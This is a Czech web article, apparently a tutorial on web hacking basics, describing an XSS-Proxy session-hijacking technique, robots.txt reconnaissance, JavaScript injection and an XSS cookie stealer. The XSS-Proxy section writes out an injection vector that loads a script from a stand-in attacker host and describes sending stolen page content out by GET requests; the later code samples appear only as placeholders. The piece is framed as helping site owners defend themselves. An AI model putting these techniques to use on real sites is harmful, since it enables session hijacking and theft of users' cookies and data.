s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky

Základy hackování webových stránek

access_time16.červen 2020personRedakce

Tento text je ucelený soubor metod útoku na web. Jsou zde popsány základní principy důležité k pochopení jak takové napadnutí webové stránky může vypadat, což vám může pomoci v zabezpečení vaší webové stránky. Učit se čistě konkrétní útoky na web bez znalosti funkčnosti a vnímání souvislostí je zbytečné, na to jsou dobří boti ne lidí. Umění průniků je znalost tématu, ne použití programu s tlačítkem „háčkuj“.Základní princip útoku je získání informace. Je dobré vědět na co útočíte a jaké máte možnosti. To znamená například zjistit si jaká aplikace se za zobrazovanou stránkou skrývá nebo jaká je configurace serveru. To vede k dalšímu kroku, jak je obstarání exploitu, zdrojového kódu konkrétní webové aplikace nebo útok metodou pokus omyl. Možností je víc než dost. Konkrétní banální příklad získání kritické informace může vypadat třeba takto. Webstranka na doméně www.spatnastranka.cz má vlastní redakční systém na správu obsahu stránky. Tím odpadá možnost použití exploitu pro již nalezenou chybu nebo obstarání zdrojového kódu. Proto útočník zkusí štěstí. Podívá se jestli je na serveru soubor robots.txt. Tento soubor na serveru ani nemusí být, jde totiž o soupis pravidel pro indexovaci roboty kteří mapují stránky. Například Google robot. Webmaster do robots.txt vloží pravidlo Disallow pro objekty které nechce aby robot zaznamenal a posléze zveřejnil. Ale protože útočník se žádnými pravidli neřídí, této informace zneužije. Takže dejme tomu že obsah na www.spatnastranka.cz/robotx.txt je Disallow: /admin. Tím se útočník dozví kterou složku nebo soubor webmaster nechce světu ukázat. Přístupem na www.spatnastranka.cz/admin může být útočník extrémně příjemně překvapen nezaheslovaným administračním systémem a když ne, aspoň bude vědět kam dál směřovat své kroky. Další možné „blbé“ soubory: phpinfo.php test.php config.inc mysql.inc …JavascriptJde o nástroj určený k modifikaci stránky během zobrazování. Vkládání javascriptu není jen záležitostí autora stránky. Prohlížeč načítá všechny soubory na které stránka odkazuje a celá stránka se pak prohlíží z lokálních dat, včetně javascriptu. To dává příležitost k tomu aktivně pracovat s obsahem.Nejjednodusi vložení vlastiho scriptu do stránky na kterou se útočí je přímo přes prohlížeč. Script se vloží do panelu adresy kde se normálně píše url.1XXXXXXXXXXXXXXXX1Díky tomu je možné měnit i obsah hodnot ve formulářích které se normálně editovat nedají jako schované nebo zakázané. Konkrétní banální příklad javascript injection. Registrační formulář na stráncehttp://spatnastranka.cz/registrace.php je hlídaný javascriptem aby uživatel mohl zadávat jen znaky abecedy a čísla, ostatní znaky smaže. To je samozřejmě chyba.2XXXXXXXXXXXXXXXX1Zdroják:3XXXXXXXXXXXXXXXX1Syntaxe javascriptu umožňuje zapsat cokoliv do jednoho řádku. To dává útočníkovi větší sílu. Dejme tomu že položka jméno je ve stavu kdy do ní nelze zapisovat a tudíž měnit ji. Tímto scriptem ji lze povolit k editaci.4XXXXXXXXXXXXXXXX1Rozšířené využití tohoto útoku než jen malé změny na stránce, je například protlačení scriptu jako položky formuláře která se zobrazuje i ostatním uživatelům. Ale o tom už v XSS. Pro lepší zvládnutí Javascript injection je dobré se aspoň trochu orientovat v Javascriptu, viz http://w3.orghttp://w3schools.com http://developer.mozilla.org/en/docs/JavaScriptXSSPokročilejší technika útoku s javascriptem. Cílem útočníka je spustit script u své oběti. Toho docílí tak že script zakomponuje na stránku kterou si oběť zobrazí a tím ho spustí. Script by měl být nenápadný a efektivní. To znamená co nejméně kódu k požadovanému efektu. Data která skript získá musí uložit na místo které je útočníkovi přístupné. Utocnik tak může získat informace o uzovateli a dále je použit. Aby script byl účinný musí být vložen na stránku se kterou má oběť nějaký vztah. Například administartor fóra. Admin aby mohl spravovat fórum musí se přihlásit, po přihlášení obdrží identifikační data díky kterým fórum zase pozná že uživatel s těmito daty je amdin. Ano, útočník chce získat datakterá dostal admin aby se za něj mohl vydávat. V předcházející kapitole o Javascriptu jste si mohli všimnout že Javascript pracuje pouze s daty patřícími k zobrazované stránce. Proto musí být útočníkův script spuštěn na stránce fóra. Způsobu vložení scriptu je víc, záleží jen od neznalosti autora stránky aznalosti útočníka. Pokud fórum nekontroluje příspěvky proti scriptum, zde může být potenciální bezpečnostní chyba. Jiná možnost je zakomponovat script do adresy stránky. Adresa totiž může obsahovat data se kterými stránka dále pracuje a je možnost že je vkládá do zdrojového kódu stránky.Příklad. Předpokládejme že jde o nám již známou chybu. Fórum na adrese http://spatnastranka.cz/forum/ je veřejné fórum kde se může registrovat každý a identifikační data se ukládají do takzvané cookie „sušenky“. Obsah cookie si pamatuje prohlížeč, tzn. data jsou uložena lokálně u uživatele. Fórum naštěstí pro útočníka nekontroluje ke které IP jaké cookie patří. Utocnik se zaregistrujea vyzkouší v nenápadném tmavém koutu fóra jestli lze do stránky vložit script. Do pole příspěvku vloží například kód:5XXXXXXXXXXXXXXXX1a odešle jej. Zobrazí si svůj příspěvek a vyskočí okno s textem ‘hloupá chyba’, script se spustil. Smaže příspěvek a nachystá si něco lepisho. Třeba cookie stealer. Ten funguje tak že script ze stránky přesměruje uživatele na útočníkův script který si uloží data nebohého uživatele. Cookie stealer může vypadat například takto:6XXXXXXXXXXXXXXXX1Kód je pouze ilustrativní. Jde o velice nešikovný cookiestealer protože dochází k přesměrování a uživateli to bude podezřelé. Nicméně svůj účel to splní. Další velice důležitá část je přesměrování obsahu cookie od uživatele k útočníkovu scriptu. Toho docílíme javascriptem umístěným na fóru.7XXXXXXXXXXXXXXXX1A to je vše. Uživatel si zobrazí útočníkův příspěvek a najednou kouká na úplně jinou stránku. Oběť je zmatená a útočník má data potřebná k tomu aby se za něj mohl vydávat.

folder_openPřiřazené štítky